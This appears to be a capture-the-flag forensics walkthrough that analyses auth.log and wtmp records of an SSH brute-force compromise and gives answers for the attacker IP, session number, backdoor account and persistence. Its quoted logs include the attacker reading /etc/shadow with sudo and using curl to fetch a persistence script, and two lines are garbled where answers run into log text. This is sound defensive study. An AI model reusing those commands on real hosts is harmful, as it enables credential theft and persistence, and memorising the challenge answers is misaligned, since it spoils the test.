Analyzing the auth.log, can you identify the IP address used by the attacker to carry out a brute-force attack?
we can easily find it in the log file.
Mar 6 06:31:37 ip-172-31-35-28 sshd[2361]: Disconnected from invalid user server_adm 65.2.161.68 port 46614 [preauth]
Mar 6 06:31:37 ip-172-31-35-28 sshd[2368]: Received disconnect from 65.2.161.68 port 46676:11: Bye Bye [preauth]
Mar 6 06:31:37 ip-172-31-35-28 sshd[2368]: Disconnected from invalid user server_adm 65.2.161.68 port 46676 [preauth]
Mar 6 06:31:37 ip-172-31-35-28 sshd[2391]: Invalid user svc_account from 65.2.161.68 port 4675065.2.161.68
The brute force attempts were successful, and the attacker gained access to an account on the server. What is the username of this account?
We can check the message related to the login
cat auth.log | grep -i systemd-logind
Mar 6 06:19:54 ip-172-31-35-28 systemd-logind[411]: New session 6 of user root.
Mar 6 06:31:40 ip-172-31-35-28 systemd-logind[411]: New session 34 of user root.
Mar 6 06:31:40 ip-172-31-35-28 systemd-logind[411]: Session 34 logged out. Waiting for processes to exit.
Mar 6 06:31:40 ip-172-31-35-28 systemd-logind[411]: Removed session 34.
Mar 6 06:32:44 ip-172-31-35-28 systemd-logind[411]: New session 37 of user root.
Mar 6 06:37:24 ip-172-31-35-28 systemd-logind[411]: Session 37 logged out. Waiting for processes to exit.
Mar 6 06:37:24 ip-172-31-35-28 systemd-logind[411]: Removed session 37.
Mar 6 06:37:34 ip-172-31-35-28 systemd-logind[411]: New session 49 of user cyberjunkie.root
Can you identify the timestamp when the attacker manually logged in to the server to carry out their objectives?
If you see the log captured in the above question, the user root logged in at 06:31:40 and immediately logged out.
It implies the brute-forcing tool discovered the root credential and finished its process as it completed its mission.
Then, we can see the user root logged in again at 06:32:44. It implies the attacker used the discovered credential. The attacker kept the connection for around 5 minutes.
Let’s confirm whether we guessed correctly.
last -f wtmp -F
cyberjun pts/1 65.2.161.68 Wed Mar 6 01:37:35 2024 gone - no logout
root pts/1 65.2.161.68 Wed Mar 6 01:32:45 2024 - Wed Mar 6 01:37:24 2024 (00:04)
root pts/0 203.101.190.9 Wed Mar 6 01:19:55 2024 gone - no logout
reboot system boot 6.2.0-1018-aws Wed Mar 6 01:17:15 2024 still running
root pts/1 203.101.190.9 Sun Feb 11 05:54:27 2024 - Sun Feb 11 06:08:04 2024 (00:13)
root pts/1 203.101.190.9 Sun Feb 11 05:41:11 2024 - Sun Feb 11 05:41:46 2024 (00:00)
root pts/0 203.101.190.9 Sun Feb 11 05:33:49 2024 - Sun Feb 11 06:08:04 2024 (00:34)
root pts/0 203.101.190.9 Thu Jan 25 06:15:40 2024 - Thu Jan 25 07:34:34 2024 (01:18)
ubuntu pts/0 203.101.190.9 Thu Jan 25 06:13:58 2024 - Thu Jan 25 06:15:12 2024 (00:01)
reboot system boot 6.2.0-1017-aws Thu Jan 25 06:12:17 2024 - Sun Feb 11 06:09:18 2024 (16+23:57)Due to the different time zones, we have different hours. But, we can find the log by its date and minutes of the incident.
The last command shows the log related to logins. It shows the same result as we guessed.
2024-03-06 06:32:45
SSH login sessions are tracked and assigned a session number upon login. What is the session number assigned to the attacker’s session for the user account from Question 2?
Check the captured log in Question 2 above.
37
The attacker added a new user as part of their persistence strategy on the server and gave this new user account higher privileges. What is the name of this account?
We already saw it in the log
cyberjunkie
What is the MITRE ATT&CK sub-technique ID used for persistence?
If we see the log file, the attacker created a new user cyberjunkie, and gave sudo permissions.
A typical local account creation.
cat auth.log | grep -i cyberjunkie
Mar 6 06:34:18 ip-172-31-35-28 groupadd[2586]: group added to /etc/group: name=cyberjunkie, GID=1002
Mar 6 06:34:18 ip-172-31-35-28 groupadd[2586]: group added to /etc/gshadow: name=cyberjunkie
Mar 6 06:34:18 ip-172-31-35-28 groupadd[2586]: new group: name=cyberjunkie, GID=1002
Mar 6 06:34:18 ip-172-31-35-28 useradd[2592]: new user: name=cyberjunkie, UID=1002, GID=1002, home=/home/cyberjunkie, shell=/bin/bash, from=/dev/pts/1
Mar 6 06:34:26 ip-172-31-35-28 passwd[2603]: pam_unix(passwd:chauthtok): password changed for cyberjunkie
Mar 6 06:34:31 ip-172-31-35-28 chfn[2605]: changed user 'cyberjunkie' information
Mar 6 06:35:15 ip-172-31-35-28 usermod[2628]: add 'cyberjunkie' to group 'sudo'
Mar 6 06:35:15 ip-172-31-35-28 usermod[2628]: add 'cyberjunkie' to shadow group 'sudo'
Mar 6 06:37:34 ip-172-31-35-28 sshd[2667]: Accepted password for cyberjunkie from 65.2.161.68 port 43260 ssh2
Mar 6 06:37:34 ip-172-31-35-28 sshd[2667]: pam_unix(sshd:session): session opened for user cyberjunkie(uid=1002) by (uid=0)
Mar 6 06:37:34 ip-172-31-35-28 systemd-logind[411]: New session 49 of user cyberjunkie.
Mar 6 06:37:34 ip-172-31-35-28 systemd: pam_unix(systemd-user:session): session opened for user cyberjunkie(uid=1002) by (uid=0)
Mar 6 06:37:57 ip-172-31-35-28 sudo: cyberjunkie : TTY=pts/1 ; PWD=/home/cyberjunkie ; USER=root ; COMMAND=/usr/bin/cat /etc/shadow
Mar 6 06:37:57 ip-172-31-35-28 sudo: pam_unix(sudo:session): session opened for user root(uid=0) by cyberjunkie(uid=1002)
Mar 6 06:39:38 ip-172-31-35-28 sudo: cyberjunkie : TTY=pts/1 ; PWD=/home/cyberjunkie ; USER=root ; COMMAND=/usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh
Mar 6 06:39:38 ip-172-31-35-28 sudo: pam_unix(sudo:session): session opened for user root(uid=0) by cyberjunkie(uid=1002)
How long did the attacker’s first SSH session last based on the previously confirmed authentication time and session ending within the auth.log? (seconds)
32:45 ~ 37:24
279
The attacker logged into their backdoor account and utilized their higher privileges to download a script. What is the full command executed using sudo?
We already captured it in Question 6.
/usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh
